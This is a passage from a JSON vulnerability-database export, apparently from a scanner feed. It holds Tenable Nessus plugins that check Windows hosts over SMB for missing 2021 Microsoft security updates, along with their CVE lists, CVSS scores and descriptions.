script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005099',\n '5005094'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005099, 5005094])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:18", "description": "The remote Windows host is missing security update 5005040.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005040: Windows 10 version 1507 LTS Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005040.NASL", "href": "https://www.tenable.com/plugins/nessus/152422", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152422);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005040\");\n script_xref(name:\"MSFT\", value:\"MS21-5005040\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005040: Windows 10 version 1507 LTS Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005040.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005040-os-build-10240-19022-e8bbfa7a-1012-4e18-a2d7-8ae6a8acf8fb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cab780fc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005040.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005040'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:10240,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005040])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-24T16:06:25", "description": "The remote Windows host is missing security update 5005106 or cumulative update 5005076. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34533, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005106: Windows 8.1 and Windows Server 2012 R2 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34533", "CVE-2021-34535", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2023-09-22T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005106.NASL", "href": "https://www.tenable.com/plugins/nessus/152433", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152433);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/22\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34533\",\n \"CVE-2021-34535\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36927\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005036\");\n script_xref(name:\"MSKB\", value:\"5005076\");\n script_xref(name:\"MSKB\", value:\"5005106\");\n script_xref(name:\"MSFT\", value:\"MS21-5005036\");\n script_xref(name:\"MSFT\", value:\"MS21-5005076\");\n script_xref(name:\"MSFT\", value:\"MS21-5005106\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005106: Windows 8.1 and Windows Server 2012 R2 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005106\nor cumulative update 5005076. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34533, CVE-2021-34535,\n CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/kb5005036-cumulative-security-update-for-internet-explorer-august-10-2021-621b1edb-b461-4d99-ae3e-5add55e53895\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0fe73cef\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005076-monthly-rollup-bf677fed-96d9-475e-87c1-a053fa75fef7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0e0382f6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005106-security-only-update-d1ab5a34-55c1-4f66-8776-54a0c3bf40a7\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57da6a50\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005106 or Cumulative Update KB5005076.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005106',\n '5005076'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3', \n sp:0,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005106, 5005076])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:04:00", "description": "The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732, CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-1734, CVE-2021-24076, CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-24080, CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-1722, CVE-2021-24074, CVE-2021-24077, CVE-2021-24081, CVE-2021-24083, CVE-2021-24088, CVE-2021-24091, CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application. (CVE-2021-1731, CVE-2021-24082)", "cvss3": {}, "published": "2021-02-09T00:00:00", "type": "nessus", "title": "KB4601315: Windows 10 Version 1909 February 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1698", "CVE-2021-1722", "CVE-2021-1727", "CVE-2021-1731", "CVE-2021-1732", "CVE-2021-1734", "CVE-2021-24074", "CVE-2021-24076", "CVE-2021-24077", "CVE-2021-24078", "CVE-2021-24079", "CVE-2021-24080", "CVE-2021-24081", "CVE-2021-24082", "CVE-2021-24083", "CVE-2021-24084", "CVE-2021-24086", "CVE-2021-24088", "CVE-2021-24091", "CVE-2021-24093", "CVE-2021-24094", "CVE-2021-24098", "CVE-2021-24102", "CVE-2021-24103", "CVE-2021-24106", "CVE-2021-25195"], "modified": "2023-01-20T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_FEB_4601315.NASL", "href": "https://www.tenable.com/plugins/nessus/146326", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(146326);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/20\");\n\n script_cve_id(\n \"CVE-2021-1698\",\n \"CVE-2021-1722\",\n \"CVE-2021-1727\",\n \"CVE-2021-1731\",\n \"CVE-2021-1732\",\n \"CVE-2021-1734\",\n \"CVE-2021-24074\",\n \"CVE-2021-24076\",\n \"CVE-2021-24077\",\n \"CVE-2021-24078\",\n \"CVE-2021-24079\",\n \"CVE-2021-24080\",\n \"CVE-2021-24081\",\n \"CVE-2021-24082\",\n \"CVE-2021-24083\",\n \"CVE-2021-24084\",\n \"CVE-2021-24086\",\n \"CVE-2021-24088\",\n \"CVE-2021-24091\",\n \"CVE-2021-24093\",\n \"CVE-2021-24094\",\n \"CVE-2021-24098\",\n \"CVE-2021-24102\",\n \"CVE-2021-24103\",\n \"CVE-2021-24106\",\n \"CVE-2021-25195\"\n );\n script_xref(name:\"MSKB\", value:\"4601315\");\n script_xref(name:\"MSFT\", value:\"MS21-4601315\");\n script_xref(name:\"IAVA\", value:\"2021-A-0072-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0093-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB4601315: Windows 10 Version 1909 February 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4601315.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1698, CVE-2021-1727, CVE-2021-1732,\n CVE-2021-24102, CVE-2021-24103, CVE-2021-25195)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-1734, CVE-2021-24076,\n CVE-2021-24079, CVE-2021-24084, CVE-2021-24106)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-24080,\n CVE-2021-24086, CVE-2021-24098)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-1722,\n CVE-2021-24074, CVE-2021-24077, CVE-2021-24081,\n CVE-2021-24083, CVE-2021-24088, CVE-2021-24091,\n CVE-2021-24093, CVE-2021-24094)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application. (CVE-2021-1731,\n CVE-2021-24082)\");\n # https://support.microsoft.com/en-us/topic/february-9-2021-kb4601315-os-build-18363-1377-bdd71d2f-6729-e22a-3150-64324e4ab954\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?93fc3ad3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4601315.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24094\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-02';\nkbs = make_list('4601315');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'02_2021',\n bulletin:bulletin,\n rollup_kb_list:[4601315])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-18T15:16:43", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-41356, CVE-2021-42274, CVE-2021-42284)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26443, CVE-2021-38666, CVE-2021-41378, CVE-2021-42276, CVE-2021-42279)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36957, CVE-2021-41366, CVE-2021-41367, CVE-2021-41370, CVE-2021-41377, CVE-2021-41379, CVE-2021-42277, CVE-2021-42280, CVE-2021-42283, CVE-2021-42285)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-38631, CVE-2021-38665, CVE-2021-41371)", "cvss3": {}, "published": "2021-11-09T00:00:00", "type": "nessus", "title": "KB5007215: Windows 11 Security Updates (November 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26443", "CVE-2021-34527", "CVE-2021-36957", "CVE-2021-38631", "CVE-2021-38665", "CVE-2021-38666", "CVE-2021-41351", "CVE-2021-41356", "CVE-2021-41366", "CVE-2021-41367", "CVE-2021-41370", "CVE-2021-41371", "CVE-2021-41377", "CVE-2021-41378", "CVE-2021-41379", "CVE-2021-42274", "CVE-2021-42276", "CVE-2021-42277", "CVE-2021-42279", "CVE-2021-42280", "CVE-2021-42283", "CVE-2021-42284", "CVE-2021-42285"], "modified": "2023-06-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_NOV_5007215.NASL", "href": "https://www.tenable.com/plugins/nessus/154997", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154997);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/06/17\");\n\n script_cve_id(\n \"CVE-2021-26443\",\n \"CVE-2021-34527\",\n \"CVE-2021-36957\",\n \"CVE-2021-38631\",\n \"CVE-2021-38665\",\n \"CVE-2021-38666\",\n \"CVE-2021-41351\",\n 